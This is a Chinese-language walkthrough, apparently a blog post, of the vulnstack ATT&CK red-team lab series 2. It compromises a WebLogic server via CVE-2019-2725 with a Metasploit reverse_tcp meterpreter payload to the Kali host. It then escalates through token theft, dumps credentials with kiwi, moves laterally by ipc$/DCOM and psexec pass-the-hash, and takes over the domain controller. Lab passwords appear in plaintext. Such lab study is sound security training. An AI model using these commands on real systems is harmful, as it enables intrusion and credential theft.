ATTCK实战系列(二)
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情
拓扑结构大体如下:
环境搭建
Kali
ip:192.168.111.135
Web
Ip1:192.168.111.80
Ip2:10.10.10.80
os:windows 2008
应用:weblogic 10.3.6 mssql 2008
Pc
Ip1:192.168.111.201
Ip2:10.10.10.201
Os:windows7
DC
ip:10.10.10.10
os:windows 2012
应用:AD域
内网:10.10.10.0/24
外网:192.168.111.0/24
从web机开始渗透, 这里需要手动开启服务,在C:
\Oracle\Middleware\user_projects\domains\base_domain\bin 有一个startweblogic的批处理, 然后管理员身份运行
账号/密码:Administrator/1qaz@WSX
目录
外网信息收集与渗透
外网信息收集与渗透
外网渗透
- 先开始nmap扫描一下192.168.111.0/24存活主机
然后对80 主机进行信息收集扫描
通过445端口开放就存在smb服务可能还会有ms17-010/端口溢出漏洞.
开放139端口 就存在samba服务 于是判断可能会有/远程命令执行漏洞
开放1433端口 就存在mssql服务 有可能存在爆破/注入/SA弱口令
开放3389 那就是远程桌面喽
7001端口 百度了一下得知是 weblogic服务
一键漏洞扫描检测工具,提供一键poc检测,收录几乎全部weblogic历史漏洞。
https://github.com/rabbitmask/WeblogicScan 原版
https://github.com/dr0op/WeblogicScan 修改版,多一个CVE检测,高亮美化
weblogicScan进行扫描漏洞
然后百度了一下 CVE-2019-2725漏洞
CVE-2019-2725是一个 weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder(xml解码器)反序列化漏洞
然后通过msf查看一下漏洞利用脚本
然后进入开始利用模块 use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 进入CVE-2019-2725攻击漏洞模块 set target windows 这个模块默认是unix 所以我们的目标是windows 所以 改一下即可 Set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.111.135 Set rhosts 192.168.111.80 要攻击目标 run |
内网提权
本来想直接提权,但是发现不能提system权限
system权限
方法1.
然后通过显示进程pid 然后用 migrate 进行进程迁移 获得system权限
方法2.
还可以通过令牌窃取的方式进行提权
load incognito #加载incognito(伪装)
Getuid #查看当前token
list_tokens -u #列出可用token
impersonate_token "NT AUTHORITY\\SYSTEM" #token窃取,格式为impersonate_token"主机名\\用户名"
rev2self #返回之前的token
然后使用 kiwi 获取 hash 账号密码
然后获得了域里的用户和密码 下面使用用户密码进行远程登录
开始第二阶段的信息搜集
Net config workstation #查域信息
得到域信息 还有10.10.10.0/24网段
设置一条通往10.10.10.0/24网段的路由
然后设置代理
使用use post/windows/gather/arp_scanner模块
扫描网段存活主机
然后又通过web 进行信息收集了一下
得知 10.10.10.10 就是域控
域成员 处理web 还有一个PC机
然后判断PC ip是10.10.10.201
下面渗透pc域用户
方法一
首先用kali生成一个payload
然后通过web机 上传到 10.10.10.201c盘
先上传到web里
再控制WEB主机与PC建立一个ipc$连接:
net use \\10.10.10.201\ipc$ "lbb1111.." /user:administrator
然后把刚才上传的文件copy到10.10.10.201 c盘
然后再meterpreter中载入powershell模块
在powershell里面执行如下命令,控制WEB主机使用DCOM在远程机器PC上执行刚刚上传到PC主机C盘里的木马:
然后从新开启一个msf 监听生成的 payload 1520 端口
成功反弹
下面开始提权
方法二
代理nmap扫描10.10.10.201
使用 exploit/windows/smb/psexec模块进行哈希传递
由于一开始再web机得知了域\用户\密码
说以就可以用这个模块直接打了
Set smbdomain DE1AY #域
Set smbuser administrator # 域用户
Set smbpass lbb1111.. #域用户密码
直接system权限
通过扫描得知3389是开哒
然后尝试一下代理远程能不能直接登录
- 向DC 域控发起进攻
同样直接利用msf的exploit/windows/smb/psexec模块进行哈希传递
拿下域控制器 并且是system权限
ATTCK实战系列(二)相关推荐
- xen虚拟化实战系列(二)之xen虚拟机安装
xen虚拟化实战系列文章列表 xen虚拟化实战系列(一)之xen虚拟化环境安装 xen虚拟化实战系列(二)之xen虚拟机安装 xen虚拟化实战系列(三)之xen虚拟机复制 xen虚拟化实战系列(四)之 ...
- 【Youtobe trydjango】Django2.2教程和React实战系列二【settings配置文件】
[Youtobe trydjango]Django2.2教程和React实战系列二[settings配置文件] 1. Django项目初始化过程 2. 全貌 3. 详细解释 4. 增加其他配置 1. ...
- [VulnStack] ATTCK实战系列—红队实战(二)
文章目录 0x00 环境搭建 0x01 信息收集 端口探测 目录扫描 0x02 漏洞利用 0x03 内网收集 主机信息搜集 域信息收集 内网漏洞扫描 0x04 横向渗透 MS17-010 PsExec ...
- ATTCK实战系列——红队实战(一)
文章目录 环境搭建 渗透测试部分 phpmyadmin 日志 getshell yxcms 前端 XSS 任意文件写入 getshell 任意文件删除 后渗透阶段 域控信息收集 域外信息收集与渗透 3 ...
- ATTCK实战系列——红队实战(五)
ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...
- ATTCK实战系列——红队实战(—)
ATT&CK实战系列--红队实战(-) 文章目录 ATT&CK实战系列--红队实战(-) 前言 一.环境搭建 1.1 靶场下载 1.2 网卡配置 二.外网渗透 三.内网渗透 1. 尝试 ...
- MP实战系列(二)之集成swagger
其实与spring+springmvc+mybatis集成swagger没什么区别,只是之前写的太不好了,所以这次决定详细写. 提到swagger不得不提rest,rest是一种架构风格,里面有对不同 ...
- 红日ATTCK实战系列(一)
靶机信息 靶机基本描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,完全模拟ATT&CK攻击链路进行搭建 靶机下载地址:http://vulnstack.qiyuanxuetang. ...
- 活动目录实战系列二(主域控无法正常启动)
今天一大早过来,发现WIN98客户端无法登陆,一检查主域控DOWN机了,没法启动.幸好做了额外DC,通过抢占PDC角色,提升额外DC为主DC,先使客户机正常登录域环境,这样我们为修复主域控争取时间.环 ...
最新文章
- python opencv 实现Reinhard颜色迁移算法
- C++零碎知识点(一)
- Angular 选项卡
- ubuntu18.04 更改apt源
- Spring Cloud Gateway不能使用外置tomcat部署的问题
- zabbix安装php7.0,Centos 7.0安装Zabbix server详细步骤(示例代码)
- org.apache.jasper.JasperException: An exception occurred processing JSP page /admin/jiaoshi/daochuEx
- [Selenium] 操作新弹出窗口之验证标题和内容
- 成都Uber优步司机奖励政策(3月28日)
- VTK(0)---CMake工程
- 推荐一款好用的加密软件 filepackage 文件加密 U盘加密 移动硬盘加密
- 机械专业向机器人工程专业转型的可行性与前景分析
- 不同手机型号图文预览_手机型号的不同后缀都代表什么意思?看完买手机再也不入坑!...
- 通用型二阶卡尔曼滤波算法
- HSB”、lab、CMYK、RGB有什么区别
- Single Image Dehazing via Multi-Scale Convolutional Neural Networks
- Hystrix断路器配置
- 注塑模具设计时,需要依据哪些设定原则?
- C#开发BIMFACE系列18 服务端API之获取模型数据3:获取构件属性
- 深入浅出 Webpack
热门文章
- ContentResolver
- 基于出库单申请电子面单的API接口文档
- 看完相当于学过并实践用过arduino! ——复现arduino开发板的众多小实验
- 计算机兴趣小组电脑画图教案,电脑绘画兴趣小组教学教案.doc
- php的js定义全局变量,使用vue.js怎么定义全局变量
- 28个案例问题分析---22---原型图的面向对象--xiaopiu
- linux动态调频响应时间,CPU动态调频(linux 3.14.0)一
- 好的履历表应包含的内容
- spdy_header
- EasyUI入门(DataGrid)